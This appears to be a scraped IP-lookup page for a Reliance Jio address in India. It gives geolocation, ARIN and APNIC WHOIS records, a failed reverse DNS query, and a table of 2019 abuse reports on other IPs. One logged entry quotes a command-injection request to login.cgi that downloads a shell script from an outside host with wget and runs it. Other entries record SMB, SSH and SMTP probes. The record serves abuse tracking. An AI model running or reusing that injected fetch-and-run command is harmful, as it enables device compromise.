城市(city): Nāthdwāra
省份(region): Rajasthan
国家(country): India
运营商(isp): Reliance
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
NetRange: 157.48.0.0 - 157.51.255.255
CIDR: 157.48.0.0/14
NetName: APNIC
NetHandle: NET-157-48-0-0-1
Parent: NET157 (NET-157-0-0-0-0)
NetType: Early Registrations, Transferred to APNIC
OriginAS:
Organization: Asia Pacific Network Information Centre (APNIC)
RegDate: 2016-03-21
Updated: 2016-03-21
Ref: https://rdap.arin.net/registry/ip/157.48.0.0
ResourceLink: https://apps.db.ripe.net/db-web-ui/query
ResourceLink: whois://whois.apnic.net
OrgName: Asia Pacific Network Information Centre
OrgId: APNIC
Address: PO Box 3646
City: South Brisbane
StateProv: QLD
PostalCode: 4101
Country: AU
RegDate:
Updated: 2012-01-24
Ref: https://rdap.arin.net/registry/entity/APNIC
ReferralServer: whois://whois.apnic.net
ResourceLink: http://wq.apnic.net/whois-search/static/search.html
OrgAbuseHandle: AWC12-ARIN
OrgAbuseName: APNIC Whois Contact
OrgAbusePhone: +61 7 3858 3188
OrgAbuseEmail: search-apnic-not-arin@apnic.net
OrgAbuseRef: https://rdap.arin.net/registry/entity/AWC12-ARIN
OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net
OrgTechRef: https://rdap.arin.net/registry/entity/AWC12-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
Found a referral to whois.apnic.net.
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '157.48.0.0 - 157.48.255.255'
% Abuse contact for '157.48.0.0 - 157.48.255.255' is 'ip.abuse@ril.com'
inetnum: 157.48.0.0 - 157.48.255.255
netname: RELIANCEJIO-IN
descr: Reliance Jio infocomm ltd
country: IN
admin-c: RJIL1-AP
tech-c: RJIL1-AP
abuse-c: AI808-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-IN-RELIANCEJIO
mnt-irt: IRT-INFOTELR4G-IN
last-modified: 2021-02-04T11:06:14Z
source: APNIC
irt: IRT-INFOTELR4G-IN
address: Reliance Jio Infocomm Ltd RCP Ghansoli
e-mail: ip.abuse@ril.com
abuse-mailbox: ip.abuse@ril.com
admin-c: IBSP1-AP
tech-c: IBSP1-AP
auth: # Filtered
remarks: ip.abuse@ril.com was validated on 2025-08-01
mnt-by: MAINT-RELIANCE-INFOTEL-IN
last-modified: 2025-11-18T00:27:50Z
source: APNIC
role: ABUSE INFOTELR4GIN
country: ZZ
address: Reliance Jio Infocomm Ltd RCP Ghansoli
phone: +000000000
e-mail: ip.abuse@ril.com
admin-c: IBSP1-AP
tech-c: IBSP1-AP
nic-hdl: AI808-AP
remarks: Generated from irt object IRT-INFOTELR4G-IN
remarks: ip.abuse@ril.com was validated on 2025-08-01
abuse-mailbox: ip.abuse@ril.com
mnt-by: APNIC-ABUSE
last-modified: 2025-08-01T07:19:54Z
source: APNIC
role: Reliance Jio Infocomm Limited
address: Reliance JIO INFOCOMM LTD GHANSOLI INDIA
country: IN
phone: +91-44770000
e-mail: ip.management@ril.com
admin-c: RJIL1-AP
tech-c: RJIL1-AP
nic-hdl: RJIL1-AP
mnt-by: MAINT-IN-RELIANCEJIO
last-modified: 2016-03-09T23:55:07Z
source: APNIC
% Information related to '157.48.192.0/21AS55836'
route: 157.48.192.0/21
origin: AS55836
descr: Reliance Jio Infocomm Limited
Reliance Coporate IT park LTD
Ghansoli NaviMumbai
mnt-by: MAINT-IN-RELIANCEJIO
last-modified: 2025-04-30T07:53:48Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.36-SNAPSHOT (WHOIS-AU5)
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 157.48.194.106
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31544
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;157.48.194.106. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026020302 1800 900 604800 86400
;; Query time: 10 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Feb 04 10:36:25 CST 2026
;; MSG SIZE rcvd: 107
b'Host 106.194.48.157.in-addr.arpa not found: 2(SERVFAIL)
'
server can't find 157.48.194.106.in-addr.arpa: SERVFAIL
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 118.24.163.20 | attack | 118.24.163.20 - - [28/Jun/2019:12:50:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ... |
2019-06-28 20:00:05 |
| 200.205.141.57 | attackbotsspam | Unauthorized connection attempt from IP address 200.205.141.57 on Port 445(SMB) |
2019-06-28 20:15:07 |
| 14.141.147.138 | attack | Unauthorized connection attempt from IP address 14.141.147.138 on Port 445(SMB) |
2019-06-28 20:48:03 |
| 49.231.13.190 | attack | Unauthorized connection attempt from IP address 49.231.13.190 on Port 445(SMB) |
2019-06-28 20:40:11 |
| 92.118.37.81 | attackbotsspam | 28.06.2019 12:13:44 Connection to port 18270 blocked by firewall |
2019-06-28 20:25:41 |
| 113.22.239.115 | attackbotsspam | Unauthorized connection attempt from IP address 113.22.239.115 on Port 445(SMB) |
2019-06-28 20:39:05 |
| 192.241.220.228 | attackbots | Invalid user admin from 192.241.220.228 port 54086 |
2019-06-28 20:32:40 |
| 150.161.8.120 | attackspambots | Jun 28 12:11:35 bouncer sshd\[28805\]: Invalid user friend from 150.161.8.120 port 60122 Jun 28 12:11:35 bouncer sshd\[28805\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=150.161.8.120 Jun 28 12:11:38 bouncer sshd\[28805\]: Failed password for invalid user friend from 150.161.8.120 port 60122 ssh2 ... |
2019-06-28 20:41:41 |
| 173.12.157.141 | attackspam | Invalid user peuser from 173.12.157.141 port 35746 |
2019-06-28 20:36:14 |
| 211.210.13.201 | attack | Jun 28 13:38:25 debian sshd\[9894\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.210.13.201 user=root Jun 28 13:38:27 debian sshd\[9894\]: Failed password for root from 211.210.13.201 port 38114 ssh2 ... |
2019-06-28 20:46:00 |
| 14.247.229.255 | attackbots | Jun 28 06:52:44 f201 postfix/smtpd[6584]: connect from unknown[14.247.229.255] Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x Jun x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=14.247.229.255 |
2019-06-28 20:19:31 |
| 191.240.69.43 | attack | SMTP/25/465/587-993/995 Probe, Reject, BadAuth, Hack, SPAM - |
2019-06-28 20:08:13 |
| 218.253.69.235 | attackbots | Unauthorized connection attempt from IP address 218.253.69.235 on Port 445(SMB) |
2019-06-28 20:31:42 |
| 14.162.102.102 | attackspam | Unauthorized connection attempt from IP address 14.162.102.102 on Port 445(SMB) |
2019-06-28 20:24:13 |
| 151.66.143.105 | attackspam | 28.06.2019 05:05:38 Command injection vulnerability attempt/scan (login.cgi) |
2019-06-28 20:45:19 |